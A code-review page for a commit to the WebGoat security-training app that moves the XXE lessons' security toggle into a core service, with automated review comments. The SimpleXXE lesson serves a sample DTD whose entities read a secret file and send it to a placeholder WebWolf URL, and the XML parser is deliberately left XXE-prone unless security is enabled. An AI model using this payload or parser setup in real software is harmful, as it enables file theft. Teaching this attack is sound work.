Move enabling security to WebGoat core and add resetting the lessons.
We can use it for more lessons and showcase how to apply security directly from the source code. Resolves: #1176
@ -83,11 +83,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
|
||||
}
|
||||
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
Comment comment = comments.parseXml(commentStr);
|
||||
if (CONTENTS.contains(comment.getText())) {
|
||||
comment.setText("Nice try, you need to send the file to WebWolf");
|
||||
}
|
||||
|
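Review bot: After this hunk the call `Comment comment = comments.parseXml(commentStr);` no longer shows that XXE hardening is decided inside `Comments.parseXml` from `webSession.isSecurityEnabled()` instead of from the session attribute the hunk removes, so at this call site a reader cannot tell the lesson's secure and insecure paths apart. A short comment such as `// parseXml disables external DTD/schema access only when security is enabled for this session` would keep that visible. The same call appears in ContentTypeAssignment.createNewComment and SimpleXXE.createNewComment in this commit, so one comment style should be used in all three. The enclosing try block and method start and end outside this hunk.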
@ -89,11 +89,11 @@ public class Comments {
|
||||
* XmlMapper bean defined above will be used automatically and the Comment class can be directly used in the
|
||||
* controller method (instead of a String)
|
||||
*/
|
||||
protected Comment parseXml(String xml, boolean secure) throws JAXBException, XMLStreamException {
|
||||
protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
|
||||
var jc = JAXBContext.newInstance(Comment.class);
|
||||
var xif = XMLInputFactory.newInstance();
|
||||
|
||||
if (secure) {
|
||||
if (webSession.isSecurityEnabled()) {
|
||||
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
|
||||
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
|
||||
}
|
||||
|
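Review bot: The Javadoc ending at `*/` directly above `parseXml` still only describes the XmlMapper bean, yet this method is now the single place where the parser's security posture is chosen; it should say that external DTD and schema access is disabled on the `XMLInputFactory` only when the session's security flag is on and that the parser is otherwise left in its default, XXE-prone configuration, with `@param xml` and `@throws JAXBException`/`@throws XMLStreamException` lines. In the hardened branch, `xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);` would additionally stop DTD processing (and therefore entity expansion) altogether, which `ACCESS_EXTERNAL_DTD` alone does not do; presumably the lesson intentionally demonstrates just the two JAXP access properties, so this is only worth a comment if that is the case. The two inline comments `// Compliant` and `// compliant` could also share one spelling. The `webSession` field and the remainder of the method body are outside this hunk.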
@ -68,11 +68,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
|
||||
if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
|
||||
String error = "";
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
Comment comment = comments.parseXml(commentStr);
|
||||
comments.addComment(comment, false);
|
||||
if (checkSolution(comment)) {
|
||||
attackResult = success(this).build();
|
||||
|
@ -30,7 +30,6 @@ import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.beans.factory.annotation.Value;
|
||||
import org.springframework.http.MediaType;
|
||||
import org.springframework.web.bind.annotation.GetMapping;
|
||||
import org.springframework.web.bind.annotation.PostMapping;
|
||||
import org.springframework.web.bind.annotation.RequestBody;
|
||||
import org.springframework.web.bind.annotation.RequestMapping;
|
||||
@ -66,15 +65,10 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
@PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
|
||||
@ResponseBody
|
||||
public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) throws Exception {
|
||||
public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) {
|
||||
String error = "";
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
//System.err.println("Comment " + comment);
|
||||
var comment = comments.parseXml(commentStr);
|
||||
comments.addComment(comment, false);
|
||||
if (checkSolution(comment)) {
|
||||
return success(this).build();
|
||||
@ -103,21 +97,12 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
@RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getSampleDTDFile() {
|
||||
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
|
||||
+ "<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n"
|
||||
+ "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n"
|
||||
+ "%all;";
|
||||
}
|
||||
|
||||
@GetMapping(path="/xxe/applysecurity",produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String setSecurity(HttpServletRequest request) {
|
||||
|
||||
String applySecurity = (String) request.getSession().getAttribute("applySecurity");
|
||||
if (applySecurity == null) {
|
||||
request.getSession().setAttribute("applySecurity", "true");
|
||||
}
|
||||
return "xxe security patch is now applied, you can try the previous challenges and see the effect!";
|
||||
return """
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % file SYSTEM "file:replace-this-by-webgoat-temp-directory/XXE/secret.txt">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>">
|
||||
%all;
|
||||
""";
|
||||
}
|
||||
|
||||
}
|
||||
|
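Review bot: In getSampleDTDFile the text block closes with `"""` on a line of its own, so the returned DTD now ends with a newline after `%all;`, whereas the concatenated literal it replaces ended at `%all;` without one; if the sample DTD must stay byte-identical, keep the closing delimiter on the last content line (`%all;""";`), otherwise the change deserves a comment. The indentation of the closing delimiter also decides how much leading whitespace the text block strips, and that indentation is not visible on this page, so the served output should be checked once. The rest of the SimpleXXE class, including the catch clause that now has to handle the checked exceptions after `throws Exception` was dropped from createNewComment, is outside these hunks.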
@ -29,7 +29,6 @@ public class User {
|
||||
|
||||
private String username = "";
|
||||
private String password = "";
|
||||
private String email = "";
|
||||
|
||||
public String getPassword() {
|
||||
return password;
|
||||
@ -47,12 +46,4 @@ public class User {
|
||||
this.username = username;
|
||||
}
|
||||
|
||||
public String getEmail() {
|
||||
return email;
|
||||
}
|
||||
|
||||
public void setEmail(String email) {
|
||||
this.email = email;
|
||||
}
|
||||
|
||||
}
|
||||
|
@ -221,8 +221,8 @@
|
||||
<div class="lesson-page-wrapper">
|
||||
<div class="adoc-content" th:replace="doc:XXE_static_code_analysis.adoc"></div>
|
||||
<br/>
|
||||
<a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/xxe/applysecurity');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
|
||||
<a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/service/enable-security.mvc');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
||||
|
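Review bot: The new onclick still labels the button `Apply XXE security patch` although it now loads the application-wide `/WebGoat/service/enable-security.mvc` instead of the lesson's own endpoint, so the label under-describes the effect of the click; a label such as `Apply security patch (applies to all lessons)` would match, assuming the core service is global as the commit message suggests, which this page does not show. Since `$().load()` issues a GET, the toggle changes server state on a GET request; presumably acceptable for a training application, but worth a one-line comment next to the link. The context lines also show `</html>` twice at the end of the document, which looks like a stray duplicate closing tag.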